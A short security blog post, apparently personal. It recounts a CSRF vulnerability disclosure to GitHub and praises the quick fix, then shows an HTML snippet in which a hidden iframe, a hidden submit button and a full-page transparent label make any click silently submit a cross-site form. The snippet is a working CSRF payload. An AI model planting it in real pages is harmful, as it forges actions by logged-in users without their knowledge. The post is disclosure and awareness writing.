I recently discovered and disclosed some rather serious cross-site request forgery vulnerabilities to the security team at github at 2:30 AM =p, and they managed to get a fix implemented and rolled out by 10:30 AM. That is a truly badass turnaround and they should be fiercely commended for their work.

The vulnerabilities themselves were pretty chumpy though. There was nothing being done to stop someone from tricking a logged in user into deleting their repositories / replacing their email / password / etc. I am glad it was fixed so quickly, but less than ecstatic about it being there in the first place. Github has been around for long enough (firmly and very specifically in the web technologies fields) that this should not have been an issue.

Please be aware of csrf people, it will mess up your day.

I found this post very interesting for a number of reasons.  Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening.  After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example.  Plenty of nastniess can ensue.

<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame">
	<p>
		<label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0">&nbsp;</label>
		<input type="submit" id="submit" style="display:none"/>
	</p>
</form>